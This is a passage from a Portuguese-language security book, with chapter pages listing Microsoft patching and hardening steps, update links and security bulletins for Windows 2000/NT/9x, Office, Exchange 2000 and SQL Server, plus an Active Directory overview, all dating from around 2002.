Terrorismo Tecnológico Aprenda Para Sobreviver

359

administradores de sistema, o Catálogo do Windows Update

(http://v4.windowsupdate.microsoft.com/en/default.asp)

permite selecionar as atualizações que precisam de download

e obter uma versão que pode ser distribuída pela empresa.

3. Instale o Windows 2000 Security Rollup Package 1

(http://www.microsoft.com/technet/security/news/w2ksrp1.asp)

4. Use o conjunto de ferramentas de configuração do sistema da

Microsoft

(http://www.microsoft.com/technet/prodtechnol/windows2000s

erv/deploy/confeat/securcon.asp), para configurar a

segurança do sistema e realizar análises periódicas.

5. Mantenha-se em dia com os hotfixes de segurança mais

recentes usando Security Bulletins Search

(http://www.microsoft.com/technet/security/current.asp?produc

tid=5&servicepackid=0)

6. Consulte a seção Security do Windows 2000 Resource Kit

para configurar a rede e a segurança na Internet.

7. Consulte Security Newsgroups para aprender como outros

usuários resolvem seus requisitos de segurança.

8. Atualize as ferramentas antivírus e os arquivos de assinatura

de vírus. Verifique regularmente os alertas de vírus

(http://www.microsoft.com/technet/security/virus/virus.asp).

20.3 Desktops com Windows NT 4.0

Terrorismo Tecnológico Aprenda Para Sobreviver

360

1. Familiarize-se com este guia sobre como obter segurança e

manter-se seguro

(http://microsoft.com/security/articles/steps_default.asp) e

estas práticas recomendadas para segurança da empresa

(http://www.microsoft.com/technet/treeview/default.asp?url=/te

chnet/security/bestprac/bpentsec.asp)

2. Verifique com freqüência o serviço Windows Update

(http://windowsupdate.microsoft.com/). Como alternativa para

administradores de sistema, o Catálogo do Windows Update

(http://v4.windowsupdate.microsoft.com/en/default.asp)

permite selecionar as atualizações que precisam de download

e obter uma versão que pode ser distribuída pela empresa.

3. Use o conjunto de ferramentas de configuração do sistema da

Microsoft

(http://www.microsoft.com/technet/prodtechnol/windows2000s

erv/deploy/confeat/securcon.asp) para configurar a segurança

do sistema e realizar análises periódicas.

4. Mantenha-se em dia com os hotfixes de segurança mais

recentes usando Security Bulletins Search

(http://www.microsoft.com/technet/security/current.asp?produc

tid=54)

5. Consulte a seção Security do Windows NT Resource Kit para

configurar a rede e a segurança na Internet.

Terrorismo Tecnológico Aprenda Para Sobreviver

361

6. Atualize as ferramentas antivírus e os arquivos de assinatura

de vírus. Verifique regularmente os alertas de vírus.

(http://www.microsoft.com/technet/security/virus/virus.asp)

20.4 Desktops com Windows 9X, SE e ME

1. Familiarize-se com este guia sobre como obter segurança e

manter-se seguro

(http://microsoft.com/security/articles/steps_default.asp) e

estas práticas recomendadas para segurança da empresa

(http://www.microsoft.com/technet/security/bestprac/bpentsec.

asp)

2. Verifique com freqüência o serviço Windows Update.

(http://windowsupdate.microsoft.com/) Como alternativa para

administradores de sistema, o Catálogo do Windows Update

(http://v4.windowsupdate.microsoft.com/en/default.asp)

permite selecionar as atualizações que precisam de download

e obter uma versão que pode ser distribuída pela empresa.

3. Atualize as ferramentas antivírus e os arquivos de assinatura

de vírus. Verifique regularmente os alertas de vírus

(http://www.microsoft.com/technet/security/virus/virus.asp)

20.5 Manutenção de segurança contínua

Terrorismo Tecnológico Aprenda Para Sobreviver

362

Sem a manutenção contínua, o seu sistema pode se tornar

vulnerável a novas formas de ataques. Siga regularmente estas

etapas recomendadas:

• Use a ferramenta Hfnetchk

(http://www.microsoft.com/technet/security/tools/tools/hfnetchk

.asp) para avaliar as correções de segurança que foram

aplicadas ao sistema operacional Windows 2000, assim como

as correções de segurança para o Internet Information

Services 5.0, o SQL Server 7.0, o SQL Server 2000 (incluindo

o Microsoft Data Engine [MSDE]) e o Internet Explorer 5.01 ou

superior. É recomendável executar as etapas necessárias

para assegurar que todos os patches de segurança críticos

sejam instalados.

• Inscreva-se no Microsoft Security Notification Service.

(http://www.microsoft.com/technet/security/bulletin/notify.asp)

Esse é um serviço gratuito de notificação por email que a

Microsoft utiliza para enviar informações aos assinantes sobre

a segurança dos produtos da Microsoft.

• É importante aplicar as novas correções de segurança

disponibilizadas. A Microsoft criou a ferramenta Qchain

(http://www.microsoft.com/downloads/release.asp?ReleaseID

=29821) para reunir os hotfixes, de forma que somente uma

reinicialização seja necessária durante a instalação de várias

correções.

Terrorismo Tecnológico Aprenda Para Sobreviver

363

20.6 Desktops com Office

1. Mantenha o sistema atualizado automaticamente por meio do

site Office Update em

http://office.microsoft.com/brasil/productupdates/default.aspx.

o Para administradores de sistemas, o Centro de

download

(http://office.microsoft.com/brasil/Downloads/default.asp

x) do Office permite selecionar as atualizações que

precisam de download e obter uma versão que pode

ser distribuída pela empresa.

2. Consulte a área Office Security na Microsoft TechNet

(http://microsoft.com/technet/security/default.asp) para

acessar uma lista abrangente de boletins de hotfixes e

segurança para sua versão do Microsoft Office.

3. Mantenha-se em dia com os hotfixes de segurança mais

recentes usando Security Bulletins Search

(http://www.microsoft.com/technet/security/current.asp)

4. Atualize as ferramentas antivírus e os arquivos de assinatura

de vírus. Verifique regularmente os alertas de vírus.

(http://www.microsoft.com/technet/security/virus/virus.asp)

Terrorismo Tecnológico Aprenda Para Sobreviver

364

20.7 Servidores Exchange 2000

1. Antes de começar: atualize os servidores que estiverem

executando o Exchange 2000, o Active Directory Connector e

o Exchange Conferencing e todos os controladores de

domínio e os servidores de catálogo global para o Windows

2000 Service Pack 2.

1.1 Instale o Windows 2000 Service Pack (http://www.microsoft.com/windows2000/downloads/servicepa

cks/sp2/default.asp) mais recente. Siga o Microsoft Windows 2000 Service Pack (http://www.microsoft.com/technet/prodtechnol/windows2000s

erv/support/spdeploy.asp) Installation and Deployment Guide (site em inglês) para obter informações detalhadas sobre

como instalar o Service Pack.

Instale os hotfixes pós-SP2 críticos para o Windows 2000.

1.2 Instale o Security Rollup Package (SRP1).

Q311401 (http://support.microsoft.com/default.aspx?scid=kb;en-

us;Q311401), "Windows 2000 Security Rollup Package 1

Terrorismo Tecnológico Aprenda Para Sobreviver

365

(SRP1)", lançado em 30 de janeiro de 2002. O Windows 2000

SRP1 ultrapassa o Windows 2000 SP2 e deve ser aplicado.

1.3 Instale o SNMP Security Update.

Q314147 (http://support.microsoft.com/default.aspx?scid=kb;en-

us;Q314147) , "MS02-006: An Unchecked Buffer in the SNMP

Service May Allow Code to Run (Q314147)" (site em inglês)

lançado em 15 de fevereiro de 2002

1.4 Instale o Patch de segurança: SMTP Rollup.

Q313450 (http://support.microsoft.com/default.aspx?scid=kb;en-

us;Q313450) , "Windows 2000 Security Patch: SMTP Rollup"

(site em inglês), lançado em 27 de fevereiro de 2002

1.5 Execute o IIS Lockdown Wizard.

A Microsoft lançou uma versão atualizada do IIS Lockdown Wizard versão 2.1 (http://www.microsoft.com/technet/treeview/default.asp?url=/te

chnet/security/Default.asp) (site em inglês), que fornece

modelos para os principais produtos Microsoft dependentes

do IIS. O IIS Lockdown Wizard desativa recursos

desnecessários, reduzindo assim a superfície de ataque

Terrorismo Tecnológico Aprenda Para Sobreviver

366

disponível a invasores. Para fornecer uma defesa satisfatória

ou várias camadas de proteção contra invasores, o URLscan,

com modelos personalizados para cada função de servidor

com suporte, foi integrado ao IIS Lockdown Wizard.

Para fazer o download da ferramenta,

(http://www.microsoft.com/Downloads/Release.asp?ReleaseI

D=33961) (site em inglês)

1.6 Faça o download e execute o Microsoft Baseline Security Analyzer (MBSA) (http://support.microsoft.com/view/tn.asp?kb=320454) para

obter um relatório sobre os problemas de configuração de

segurança mais comuns.

Para obter mais informações sobre a segurança do Windows

2000,

http://www.microsoft.com/technet/security/tools/chklst/wsrvsec

.asp (site em inglês)

2. Instale o Exchange 2000 Service Pack (http://www.microsoft.com/exchange/downloads/2000/sp2/def

ault.asp) mais recente

Siga este guia:

Terrorismo Tecnológico Aprenda Para Sobreviver

367

a. Se for uma instalação sem cluster, siga o Exchange 2000 Service Pack 2 Deployment Guide http://www.microsoft.com/exchange/techinfo/deploymen

t/2000/SP2Deployment.asp).

b. Se for uma instalação em cluster, siga o guia

Deploying Microsoft Exchange 2000 Server Service Pack 2 Clusters (http://www.microsoft.com/technet/treeview/default.asp?

url=/technet/prodtechnol/exchange/support/sp2ClustGd/

1-Intro.asp ) (site em inglês).

3. Instale os hotfixes pós-SP2 do Exchange 2000 relevantes

(sites em inglês):

3.1 Q316056 (http://support.microsoft.com/view/tn.asp?kb=316056) XGEN:

Exchange 2000 Server Post-SP2 Admin Fixes Available

3.2 Q315911 (http://support.microsoft.com/view/tn.asp?kb=3159110 XGEN:

Exchange 2000 Server Post-SP2 MTA Fixes Available

3.3 Q316463 (http://support.microsoft.com/view/tn.asp?kb=316463) XGEN:

Exchange 2000 Server Post-Service Pack 2 Directory Fixes A

Terrorismo Tecnológico Aprenda Para Sobreviver

368

3.4 Q316465 (http://support.microsoft.com/view/tn.asp?kb=316465) XGEN:

Exchange 2000 Server Post-Service Pack 2 CDO Fixes

3.5 Q316664 (http://support.microsoft.com/view/tn.asp?kb=316664) XGEN:

Exchange 2000 Server Post-Service Pack 2 Protocols Fixes

3.6 Q317323 (http://support.microsoft.com/view/tn.asp?kb=317323) XGEN:

Exchange 2000 Server Post-Service Pack 2 Transport Fixes

Para obter uma lista dos artigos sobre hotfix pós-SP2 do

Microsoft Exchange 2000 Server, vá em

http://support.microsoft.com/view/tn.asp?kb=301378 site em

inglês)

Exchange 2000 Conferencing Server

Para obter informações adicionais sobre como adquirir os

pacotes de serviços do Exchange 2000 Conferencing Server,

clique no número do artigo a seguir para exibi-lo no Microsoft

Knowledge Base:

Q302473 (http://support.microsoft.com/view/tn.asp?kb=302473) XGEN:

Terrorismo Tecnológico Aprenda Para Sobreviver

369

How to Obtain the Latest Exchange 2000 Conferencing Server

Service Pack

4. Fique atualizado com os hotfixes de segurança mais recentes

usando Security Bulletins Search 5. Atualize as ferramentas antivírus e os arquivos de assinatura

de vírus. Verifique os alertas de vírus

(http://www.microsoft.com/technet/security/virus/virus.asp) (site em inglês) regularmente.

Manutenção de segurança contínua

Sem a manutenção contínua, o seu sistema pode se tornar

vulnerável a novas formas de ataques. Siga regularmente estas

etapas recomendadas:

• Use a ferramenta Hfnetchk

(http://www.microsoft.com/technet/security/tools/tools/hfnetchk

.asp) para avaliar as correções de segurança que foram

aplicadas ao sistema operacional Windows 2000, assim como

as correções de segurança para o Internet Information

Services 5.0, o SQL Server 7.0, o SQL Server 2000 (incluindo

o Microsoft Data Engine [MSDE]) e o Internet Explorer 5.01 ou

superior. É recomendável executar as etapas necessárias

para assegurar que todos os patches de segurança críticos

sejam instalados.

Terrorismo Tecnológico Aprenda Para Sobreviver

370

• Inscreva-se no Microsoft Security Notification Service

(http://www.microsoft.com/technet/security/bulletin/notify.asp)

(site em inglês). Esse é um serviço gratuito de notificação por

email que a Microsoft utiliza para enviar informações aos

assinantes sobre a segurança dos produtos da Microsoft.

• Use o site Windows Update

(http://windowsupdate.microsoft.com/) (site em inglês) para

verificar as atualizações recomendáveis e críticas mais

recentes.

• É importante aplicar as novas correções de segurança

disponibilizadas. A Microsoft criou a ferramenta Qchain

(http://www.microsoft.com/downloads/release.asp?ReleaseID

=29821) (site em inglês) para reunir os hotfixes, de forma que

somente uma reinicialização seja necessária durante a

instalação de várias correções.

Para obter mais informações

Estas são informações adicionais sobre como manter seus

servidores Exchange seguros:

Configuration and Security Update Recommendations for Exchange 2000 (http://www.microsoft.com/Exchange/techinfo/deployment/2000/Best

Config.asp)

Terrorismo Tecnológico Aprenda Para Sobreviver

371

Home page do Microsoft Baseline Security Analyzer (http://www.microsoft.com/technet/security/tools/tools/mbsahome.as

p)

Como parte do Strategic Technology Protection Program da

Microsoft e em resposta à necessidade direta do consumidor de

obter um método fácil de identificação de problemas de segurança

comuns, a Microsoft desenvolveu o Microsoft Baseline Security

Analyzer (MBSA).

Home page do Microsoft Baseline Security Analyzer (http://www.microsoft.com/technet/security/tools/tools/mbsawp.asp)

Perguntas e respostas do Microsoft Baseline Security Analyzer (MBSA) Versão 1.0 (http://www.microsoft.com/technet/security/tools/tools/mbsaqa.asp)

Planejamento e instalação do Exchange 2000 Server Chapter 13 – System Security (http://www.microsoft.com/technet/prodtechnol/exchange/proddocs/e

x2kplan/c13secur.asp)

Exchange 2000 Server Resource Kit Chapter 24 - Security Sensitive Environments (http://www.microsoft.com/technet/prodtechnol/exchange/reskit/ex00

res/deploygd/part5/c24secur.asp)

Terrorismo Tecnológico Aprenda Para Sobreviver

372

Exchange 2000 Server Resource Kit Chapter 30 – Security (http://www.microsoft.com/technet/prodtechnol/exchange/reskit/ex00

res/resguide/c30scrty.asp)

Exchange 2000 Server Upgrade Series - Planning Guide Chapter 6 - Constructing Security and Administrative Models (http://www.microsoft.com/technet/prodtechnol/exchange/proddocs/e

x2kupgr/planus/p_06_tt1.asp)

Exchange 2000 Server Upgrade Series - Planning Guide Chapter 9 - Ensuring Messaging Security (http://www.microsoft.com/technet/prodtechnol/exchange/proddocs/e

x2kupgr/planus/p_09_tt1.asp)

Exchange 2000 Server Upgrade Series - Planning Guide Glossary - Exchange 2000, Windows 2000 And Security Glossary (http://www.microsoft.com/technet/prodtechnol/exchange/proddocs/e

x2kupgr/planus/glossary.asp)

Leveraging Security Features in Windows 2000 for Exchange (http://www.microsoft.com/technet/prodtechnol/exchange/maintain/fe

atusability/leversec.asp)

Web Storage System Security Roles (http://www.microsoft.com/technet/prodtechnol/exchange/maintain/fe

atusability/secroles.asp)

Terrorismo Tecnológico Aprenda Para Sobreviver

373

Exchange Server 5.5 Security (http://www.microsoft.com/technet/security/prodtech/exc10.asp)

Exchange Server 5.5 Resource Guide Part 11 – Security (http://www.microsoft.com/technet/prodtechnol/exchange/reskit/ex55

res/exc10.asp)

Exchange Server 5.5, 24 seven , publicado pela Sybex Inc.

Exchange Server Advanced Security (http://www.microsoft.com/technet/prodtechnol/exchange/maintain/o

ptimize/advan.asp)

Noções básicas desde 1999: Enhancing Microsoft Exchange Server's Security (http://www.microsoft.com/technet/prodtechnol/exchange/support/ex

chsec.asp)

Artigos relevantes da Knowledge Base

XCCC: IIS Lockdown and URLscan Configurations in Exchange

Environment. (Q309508)

(http://support.microsoft.com/view/tn.asp?kb=309508)

As ferramentas de segurança de serviços de informações da

Internet (IIS), IISlockD e URLscan, devem ser configuradas de forma

apropriada para o Exchange. Este artigo descreve a configuração

Terrorismo Tecnológico Aprenda Para Sobreviver

374

necessária para essas ferramentas nos ambientes do Exchange

2000 Server e do Exchange Server 5.5.

XADM: Security of Exchange 2000 for Exchange Domain Servers

Group (Q313807)

(http://support.microsoft.com/view/tn.asp?kb=313807)

Este artigo descreve como obter e usar um script que restringe o

acesso aos grupos Exchange Domain Servers em uma floresta.

Uma instalação padrão do Exchange cria um grupo Exchange

Domain Servers para cada domínio da floresta. Esse grupo contém

as contas de computador para cada servidor Exchange de um

determinado domínio. Os grupos têm acesso a todo o

armazenamento de caixa de correio e pasta pública do Exchange na

floresta. Talvez, os clientes desejem conceder acesso a

armazenamentos de caixa de correio somente ao servidor local que

hospeda os armazenamentos.

PROCEDIMENTOS: Use SMTP Connectors to Connect Routing

Groups (Q319407)

(http://support.microsoft.com/view/tn.asp?kb=319407)

Você pode usar um conector SMTP para conectar o computador

com Exchange 2000 a computadores SMTP não-Exchange Server,

como computadores na Internet. Você também pode usar um

conector SMTP para conectar grupos de roteamento do Exchange

Terrorismo Tecnológico Aprenda Para Sobreviver

375

Server em cenários onde conectores SMTP não são adequados, por

exemplo, caso a conexão entre os grupos de roteamento não for

permanente ou caso a conexão precise rotear para Internet. A

configuração de conectores SMTP é um pouco mais complexa do

que a configuração de conectores de grupo de roteamento e não

transmitem automaticamente informações de estado de conexão do

Exchange Server.

PROCEDIMENTOS: Secure SMTP Client Message Delivery in

Exchange 2000 (Q319267) (http://support.microsoft.com/view/tn.asp?kb=3192670)

Este artigo descreve passo a passo como criptografar a entrega de

email de protocolo de transferência de correio simples (SMTP) para

conexões de entrada de cliente (POP3 e IMAP4) em computadores

com Exchange 2000, de modo que os usuários possam autenticar e

receber material potencialmente sensível sem que o nome de

usuário, a senha ou o conteúdo da mensagem corram o risco de

serem interceptados.

PROCEDIMENTOS: Secure IMAP Client Access in Exchange 2000

(Q319278) (http://support.microsoft.com/view/tn.asp?kb=319278)

Este artigo descreve passo a passo como configurar a segurança

para conexões de entrada de protocolo de acesso a mensagens da

Internet versão 4 (IMAP4) em computadores com Exchange 2000,

de modo que os usuários possam autenticar e receber material

Terrorismo Tecnológico Aprenda Para Sobreviver

376

potencialmente sensível sem que o nome de usuário, a senha ou o

conteúdo da mensagem corram o risco de serem interceptados.

PROCEDIMENTOS: Secure Post Office Protocol Client Access in

Exchange (Q319273) (http://support.microsoft.com/view/tn.asp?kb=319273)

20.8 Mantendo o SQL Seguro

Antes de começar: você deve atualizar os servidores que

estiverem executando o SQL Server para o Windows 2000 Service

Pack 2.

Instale o Windows 2000 Service Pack mais recente (http://www.microsoft.com/windows2000/downloads/servicepa

cks/sp2/default.asp ) (site em inglês). Siga o Microsoft Windows 2000 Service Pack Installation and Deployment Guide (http://www.microsoft.com/technet/prodtechnol/windows2000s

erv/support/spdeploy.asp) (site em inglês) para obter

informações detalhadas sobre como instalar o Service Pack.

Você também deve instalar os hotfixes pós-SP2 críticos para o

Windows 2000.

1. Instale o Security Rollup Package.

Terrorismo Tecnológico Aprenda Para Sobreviver

377

Q311401 (http://support.microsoft.com/default.aspx?scid=kb;en-

us;Q311401) "Windows 2000 Security Rollup Package 1

(SRP1)" (site em inglês), lançado em 30 de janeiro de 2002

2. Instale o SNMP Security Update.

Q314147 (http://support.microsoft.com/default.aspx?scid=kb;en-

us;Q314147) , "MS02-006: An Unchecked Buffer in the SNMP

Service May Allow Code to Run (Q314147)" (site em inglês)

lançado em 15 de fevereiro de 2002

3. Execute o IIS Lockdown Wizard.

A Microsoft lançou uma versão atualizada do IIS Lockdown Wizard versão 2.1 (http://www.microsoft.com/technet/treeview/default.asp?url=/te

chnet/security/Default.asp) (site em inglês), que fornece

modelos para os principais produtos Microsoft dependentes

do IIS. O IIS Lockdown Wizard desativa recursos

desnecessários, reduzindo assim a superfície de ataque

disponível a invasores. Para fornecer uma defesa satisfatória

ou várias camadas de proteção contra invasores, o URLscan,

com modelos personalizados para cada função de servidor

com suporte, foi integrado ao IIS Lockdown Wizard.

Terrorismo Tecnológico Aprenda Para Sobreviver

378

Para fazer o download da ferramenta, vá para

http://www.microsoft.com/Downloads/Release.asp?ReleaseID

=33961 (site em inglês)

4. Faça o download e execute o Microsoft Baseline Security

Analyzer (MBSA)

(http://support.microsoft.com/view/tn.asp?kb=320454) (site em

inglês) para obter um relatório sobre os problemas de

configuração de segurança comuns.

Para obter mais informações sobre a segurança do Windows 2000, vá para (http://www.microsoft.com/technet/security/tools/chklst/wsrvsec.asp) (site em inglês)

20.9 Servidores SQL Server 2000

Instale o SQL Server 7.0 Service Pack (http://www.microsoft.com/sql/downloads/2000/sp2.asp) (site em inglês) mais recente

Se for uma instalação sem cluster, siga estas etapas:

1. Faça backup dos bancos de dados do SQL Server

2. Faça backup dos bancos de dados do Analysis Services

3. Certifique-se de que os bancos de dados do sistema têm

espaço livre suficiente

Terrorismo Tecnológico Aprenda Para Sobreviver

379

4. Pare serviços e aplicativos antes de executar a instalação do

SP2

5. Instale o Database Components SP2

6. Instale o Analysis Services SP2

7. Instale o Desktop Engine SP2

8. Reinicie os serviços

9. Reinicie os aplicativos

As etapas descritas acima encontram-se no Leiame do SQL Server 2000 Service Pack 2 (http://support.microsoft.com/support/servicepacks/SQL/2000/SP2R

eadMe.asp) (site em inglês)

Se for uma instalação em cluster com failover, siga as etapas na

seção 3.10 "Installing on a Failover Cluster" do Leiame do SQL Server 2000 Service Pack 2 (http://support.microsoft.com/default.aspx?scid=http://support.micros

oft.com/support/servicepacks/SQL/2000/SP2ReadMe.asp#_3.10_ins

talling_on_a_failover_clusterhttp://support.microsoft.com/default.asp

x?scid=http://support.microsoft.com/suppo) (site em inglês)

Observação O SQL Server 2000 SP2 contém uma correção

adicional para English Query que você precisará aplicar

separadamente. Para obter mais informações sobre essa correção,

consulte "FIX: Potential English Query Security Issue" Q297105

Terrorismo Tecnológico Aprenda Para Sobreviver

380

(http://support.microsoft.com/view/tn.asp?kb=297105) (site em

inglês)

Observação Os usuários do SQL Server 2000 Windows CE Edition que atualizarem os servidores de editor e banco de dados

do SQL Server 2000 para a versão Service Pack 2 (SP2) também

deverão atualizar os componentes de replicação dos servidores do Internet Information Services (IIS) (http://www.microsoft.com/sql/downloads/CE/sp2.asp)

Instale os hotfixes pós-SP2 do SQL Server 2000 que sejam

relevantes

Faça o download e instale o SQL Server 2000 Security Update for Service Pack 2 (http://support.microsoft.com/view/tn.asp?kb=316333) (site em

inglês)

Observe que a Microsoft distribui correções de segurança do SQL

Server 2000 por um arquivo do qual você pode fazer download.

Como as correções de segurança são cumulativas, cada nova

versão contém todas as correções de segurança incluídas na versão

anterior de correções de segurança do SQL Server 2000.

Para obter uma lista dos artigos sobre hotfixes pós-SP2 do Microsoft SQL Server 2000, vá para: (http://support.microsoft.com/default.aspx?scid=kb;EN-US;q290211) (site em inglês)

Terrorismo Tecnológico Aprenda Para Sobreviver

381

20.10 Servidores SQL Server 7.0

Instale o SQL Server 2000 Service Pack (http://www.microsoft.com/sql/downloads/sp4.asp) mais recente

Para obter mais informações sobre SQL Server 7.0 Service Packs,

consulte: Q301511 (http://support.microsoft.com/view/tn.asp?kb=301511) INF: How to Obtain the Latest SQL Server 7.0 Service Pack (site em inglês)

Siga as etapas descritas no capítulo 3 de INF: Readme.txt Files for SQL Server 7.0 Service Packs (Q321817) (http://support.microsoft.com/view/tn.asp?kb=321817) (site em

inglês)

Observação O SQL Server 7.0 SP4 não inclui atualizações para os

componentes dos serviços de processamento analítico on-line

(OLAP) do SQL Server 7.0. Para obter as atualizações mais

recentes desses componentes, faça o download da parte OLAP do

SQL Server 7.0 Service Pack 3 (http://www.microsoft.com/sql/downloads/sp3.asp)

Observe que SQL Server Security Patch (http://support.microsoft.com/default.aspx?scid=http://support.micros

oft.com/support/sql/xp_security.asp) (site em inglês) está incluído no

SQL Server 7.0 Service Pack 4

Terrorismo Tecnológico Aprenda Para Sobreviver

382

Mantenha-se atualizado a respeito dos hotfixes de segurança mais

recentes do SQL Server usando o HotFix & Security Bulletin Service (http://www.microsoft.com/technet/treeview/default.asp?url=/technet/

security/current.asp?productid=30&servicepackid=0) (site em inglês)

SQL Server 2000

Abril de 2002

MS02-020: SQL Extended Procedure Functions Contain Unchecked Buffers (Q319507) (http://www.microsoft.com/technet/treeview/default.asp?url=/technet/

security/bulletin/MS02-020.asp) (site em inglês)

Este problema foi corrigido primeiro no Microsoft SQL Server 2000

Service Pack 2.

Fevereiro de 2002

MS02-007: SQL Server Remote Data Source Function Contain Unchecked Buffers (http://www.microsoft.com/technet/security/bulletin/MS02-

007.asp)(site em inglês)

O patch para essa questão está disponível no SQL Server 2000

Security Update for Service Pack 2

Terrorismo Tecnológico Aprenda Para Sobreviver

383

Dezembro de 2001

MS01-060: SQL Server Text Formatting Functions Contain Unchecked Buffers (http://www.microsoft.com/technet/security/bulletin/MS01-060.asp) (site em inglês)

Este problema foi corrigido primeiro no SQL Server 2000 Service

Pack 2.

Julho de 2001

MS01-041: Malformed RPC Request Can Cause Service Failure (http://www.microsoft.com/technet/security/bulletin/MS01-041.asp) (site em inglês)

Este problema foi corrigido primeiro no SQL Server 2000 Service

Pack 1.

Junho de 2001

MS01-032: SQL Query Method Enables Cached Administrator Connection to be Reused (http://www.microsoft.com/technet/security/bulletin/MS01-032.asp) (site em inglês)

Este problema foi corrigido primeiro no SQL Server 2000 Service

Pack 1.

Terrorismo Tecnológico Aprenda Para Sobreviver

384

Dezembro de 2000

MS00-092: Extended Stored Procedure Parameter Parsing Vulnerability (http://www.microsoft.com/technet/security/bulletin/MS00-092.asp)

(site em inglês)

Este problema foi corrigido primeiro no SQL Server 2000 Service

Pack 1.

SQL Server 7.0

Abril de 2002

MS02-020: SQL Extended Procedure Functions Contain Unchecked Buffers (Q319507) (http://www.microsoft.com/technet/treeview/default.asp?url=/technet/

security/bulletin/MS02-020.asp) (site em inglês)

Este problema foi corrigido primeiro no Microsoft SQL Server 7.0

Service Pack 4.

Fevereiro de 2002

MS02-007: SQL Server Remote Data Source Function Contain Unchecked Buffers (http://www.microsoft.com/technet/treeview/default.asp?url=/technet/

security/bulletin/MS02-007.asp) (site em inglês)

Terrorismo Tecnológico Aprenda Para Sobreviver

385

Este problema foi corrigido primeiro no Microsoft SQL Server 7.0

Service Pack 4.

Dezembro de 2001

MS01-060: SQL Server Text Formatting Functions Contain Unchecked Buffers (http://www.microsoft.com/technet/treeview/default.asp?url=/technet/

security/bulletin/MS01-060.asp) (site em inglês)

Este problema foi corrigido primeiro no Microsoft SQL Server 7.0

Service Pack 4.

Junho de 2001

MS01-032: SQL Query Method Enables Cached Administrator Connection to be Reused (http://www.microsoft.com/technet/treeview/default.asp?url=/technet/

security/bulletin/MS01-032.asp) (site em inglês)

Este problema foi corrigido primeiro no Microsoft SQL Server 7.0

Service Pack 4.

Atualize as ferramentas antivírus e os arquivos de assinatura de

vírus. Verifique os alertas de vírus (http://www.microsoft.com/technet/security/virus/virus.asp) (site em

inglês) regularmente.

Terrorismo Tecnológico Aprenda Para Sobreviver

386

Manutenção de segurança contínua

Sem a manutenção contínua, o seu sistema pode se tornar

vulnerável a novas formas de ataques. Siga regularmente estas

etapas recomendadas:

• Use a ferramenta Hfnetchk

(http://www.microsoft.com/technet/security/tools/tools/hfnetchk

.asp) para avaliar as correções de segurança que foram

aplicadas ao sistema operacional Windows 2000, assim como

as correções de segurança para o Internet Information

Services 5.0, o SQL Server 7.0, o SQL Server 2000 (incluindo

o Microsoft Data Engine [MSDE]) e o Internet Explorer 5.01 ou

superior. É recomendável executar as etapas necessárias

para assegurar que todos os patches de segurança críticos

sejam instalados.

• Inscreva-se no Microsoft Security Notification Service

(http://www.microsoft.com/technet/security/bulletin/notify.asp)

(site em inglês). Esse é um serviço gratuito de notificação por

email que a Microsoft utiliza para enviar informações aos

assinantes sobre a segurança dos produtos da Microsoft.

• Use o site Windows Update

(http://windowsupdate.microsoft.com/) (site em inglês) para

Terrorismo Tecnológico Aprenda Para Sobreviver

387

verificar as atualizações recomendáveis e críticas mais

recentes.

• É importante aplicar as novas correções de segurança

disponibilizadas. A Microsoft criou a ferramenta Qchain

(http://www.microsoft.com/downloads/release.asp?ReleaseID

=29821) (site em inglês) para reunir os hotfixes, de forma que

somente uma reinicialização seja necessária durante a

instalação de várias correções.

Para obter mais informações

Veja a seguir informações adicionais sobre como manter seus servidores SQL Server protegidos:

20.11 Segurança do SQL Server 2000

SQL Server Security on TechNet (http://www.microsoft.com/technet/prodtechnol/sql/maintain/security/default.asp) (site em inglês)

SQL Server 2000 Operations Guide Chapter 3 - Security Administration (http://www.microsoft.com/technet/prodtechnol/sql/maintain/operate/

opsguide/sqlops3.asp) (site em inglês)

Terrorismo Tecnológico Aprenda Para Sobreviver

388

SQL Server 2000 C2 Administrator's and User's Security Guide (http://www.microsoft.com/technet/prodtechnol/sql/maintain/security/

sqlc2.asp) (site em inglês)

SQL Server 2000 Security White Paper (http://www.microsoft.com/technet/prodtechnol/sql/maintain/security/

sql2ksec.asp) (site em inglês)

SQL Server 2000 Resource Kit Chapter 10 - Implementing Security (http://www.microsoft.com/technet/prodtechnol/sql/reskit/sql2000/par

t3/c1061.asp) (site em inglês)

Microsoft SQL Server 2000 Security (http://www.microsoft.com/technet/prodtechnol/sql/deploy/confeat/05

ppcsqa.asp) no capítulo 5 de SQL Server 2000 Administrator's Pocket Consultant (http://www1.fatbrain.com/asp/bookinfo/bookinfo.asp?theisbn=07356

11297&p=technet&s=29736) (sites em inglês) de William R. Stanek

SQL Server 7.0 Administrator's Companion Chapter 7 - Managing Security (http://www.microsoft.com/technet/prodtechnol/sql/proddocs/adminc

mp/75517c07.asp) (site em inglês)

Terrorismo Tecnológico Aprenda Para Sobreviver

389

SQL Server 7.0 Resource Guide Chapter 16 - Product Security (http://www.microsoft.com/technet/prodtechnol/sql/reskit/sql7res/part

10/sqc15.asp) (site em inglês)

SQL Server 7.0 Security White Paper (http://www.microsoft.com/technet/prodtechnol/sql/maintain/security/

secure.asp) (site em inglês)

INF: List of Bugs Fixed by SQL Server 7.0 Service Packs (http://support.microsoft.com/view/tn.asp?kb=313980) (site em

inglês)

20.12 Segurança em servidores com o Win 2000 Server Tivemos a pouco tempo o lançamento do Windows 2003 Server mas as mudanças não são tantas e muitos dos recurso de segurança em um S.O. se repete no outro com pouquíssimas mudanças. • No Active Directory pode ser feita toda a política de segurança

de domínio e conta. O Active Directory, que proporciona replicação e disponibilidade de informação de conta para múltiplos Controladores de Domínio, está disponível para administração remota, suportando um espaço de nome hierárquico para informação de conta de usuário, grupo e de computador.

Active Directory e Segurança

Terrorismo Tecnológico Aprenda Para Sobreviver

390

Parte deste documento a seguir foi retirado o próprio Site da Microsoft mostrando os recursos de segurança do Active Directory no final do texto há informações para uma pesquisa mais avançada. Informação de conta no Windows NT é mantida atualmente com o uso de uma porção segura do registry nos controladores de domínio. Usando trust de domínio e autenticação pass-through, uma hierarquia de dois níveis de domínios proporciona alguma flexibilidade par a a organização do gerenciamento de contas e recursos de servidor; entretanto, as contas são mantidas em um espaço de nome flat sem nenhuma organização interna. Serviços de Segurança Distribuída Windows 2000 usam o Active Directory como o repositório para informação de conta. O Active Directory proporciona melhoria significativa na implementação baseada em registry, nas áreas de performance e escalabilidade, e oferece um ambiente administrativo com ricas funcionalidades. O diagrama seguinte mostra a estrutura hierárquica para uma árvore de domínios Windows 2000, e o contexto de nomes hierárquicos em cada domínio usando unidades organizacionais (OUs) como recipientes de objetos de diretório.

Terrorismo Tecnológico Aprenda Para Sobreviver

391

